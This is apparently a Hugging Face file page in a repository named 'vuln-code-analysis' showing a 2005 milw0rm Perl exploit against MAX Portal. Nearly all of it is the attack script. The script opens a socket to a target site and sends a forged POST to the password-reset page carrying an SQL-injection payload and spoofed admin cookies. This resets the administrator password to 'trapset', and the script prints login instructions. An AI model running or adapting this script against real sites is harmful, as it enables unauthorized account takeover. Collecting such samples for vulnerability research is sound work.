Hugging Face's logo

lilbool
/
vuln-code-analysis

Model card Files
xet
Community
vuln-code-analysis
File size: 2,749 Bytes
497f2f3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
 
#!/usr/bin/perl

#################################################################

#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m

#################################################################

# EXPLOIT FOR - MAX Portal (All Versions)

#

#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );

#E-Mail : Alpha_Programmer@Yahoo.com

#

#This Xpl Change Admin's Pass in This Portal !!

#

#Discovered by: s d <irsdl@yahoo.com>

#

#################################################################

#  Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke   &  AlphaST.Com

#

#And Iranian Hacking & Security Teams :

# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev

#################################################################

use IO::Socket;



if (@ARGV < 2)

{

 print "\n==========================================\n";

 print " \n     -- Exploit By Alpha Programmer --\n\n";

 print "     Trap-Set Underground Hacking Team      \n\n";

 print "      Usage: Max.pl <T4rg3t> <V3rsion>\n\n";

 print " V3rsion :\n";

 print " 1 ==>   Version 1.35 and 0lder\n";

 print " 2 ==>   Version 1.36, 2.0 and Next\n";

 print "==========================================\n\n";

 print "Example:\n\n";

 print "    Max.pl www.Site.com 1\n";

 exit();

}

$hell = "foo' or M_Name='admin";

if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"};





my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,

PeerPort => "80" );



unless ($remote) { die "C4nn0t C0nn3ct to $host" }



print "C0nn3cted\n";



$http = "POST /password.asp?mode=reset HTTP/1.0";

$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";

$http .= "Accept-Language: fa\n";

$http .= "Content-Type: application/x-www-form-urlencoded\n";

$http .= "Pragma: no-cache\n";

$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";

$http .= "Host: $host\n";

$http .= "Content-Length: 111\n";

$http .= "Proxy-Connection: Keep-Alive\n";

$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n";



$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n";



print "\n";

print $remote $http;

sleep(1);

print "[+] Attacking ...\n";

print "[+] Changing Admin's Password ...\n";

while (<$remote>)

{

}

print "\nNow Go to $host and Login With :\n\n";

print "User: admin\n";

print "Pass: trapset\n\n";

print "Enjoy ;)\n";

print "\n";

### EOF ###



# milw0rm.com [2005-05-26]